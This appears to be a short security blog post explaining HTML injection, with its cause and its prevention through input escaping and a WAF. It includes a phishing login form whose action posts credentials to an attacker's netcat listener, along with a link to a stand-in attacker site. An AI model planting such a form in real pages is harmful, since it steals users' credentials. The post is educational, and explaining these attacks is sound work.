Open in app

Sign in

Write

Sign in

HTML Injection

Cyber Goddess
2 min readJan 4, 2023

--

What is HTML Injection?

HTML Injection is a bug allowing an attacker to inject pure HTML code into a web-application, this gives an attacker the ability to create defacements, hyper links and more! An example of a hyper link is shown below we use anchor tags and a href attribute creating the hyper link to the specified website or file etc in our case it creates a hyper link that takes the user to an attackers website.

<a href=https://attackerwebsite.com>Blog</a>

How does HTML Injection occur?

HTML Injection occurs via untrusted user input which means there is no sanitization for the user input, it also can occur when an attacker is able to control an input point and is able to inject arbitrary HTML code. For example we have a blog and on that blog we have a comment section allowing us to input text and add a comment for others to see.

The code shown below is a login form that has two input fields a username and password then a submit button it will send credentials entered here to our server that is listening on netcat this can be used as a social engineering attack tied with stored HTML Injection to steal credentials on a blog or something else in that relation.

<form name=”login” action=”$IP:Port”>
<tr><td>Username:</td><td><input type=”text” name=”username”/></td></tr>
<tr><td>Password:</td><td><input type=”Password” name=”Password”/></td></tr>
</tables>
<input type=”submit” value=”Login”/>
</form>

How can we prevent HTML Injection?

Preventing HTML Injection is like preventing XSS, you want to sanitize/filter user input you can use something like PHP [HTMLSpecialChars] (w3schools.com/php/func_string_htmlspecialch..) a WAF (Web Application Firewall) is another great resource to invest in which will block any request that seems to have a character that is blocked in the firewall rules. The code below converts the predefined characters “<” (less than) and “>” (greater than) to HTML entities. (HTMLSpecialChars)

<?php
$str = “This is some <b>bold</b> text.”;
echo htmlspecialchars($str);
?>

The HTML output of the code above will be (View Source):

<!DOCTYPE html>
<html>
<body>
This is some &lt;b&gt;bold&lt;/b&gt; text.
</body>
</html>

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Html Injection
Hacking

--

--

Cyber Goddess
Cyber Goddess

Written by Cyber Goddess

6 Followers
1 Following

Cyber Security Researcher | Vlogger

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams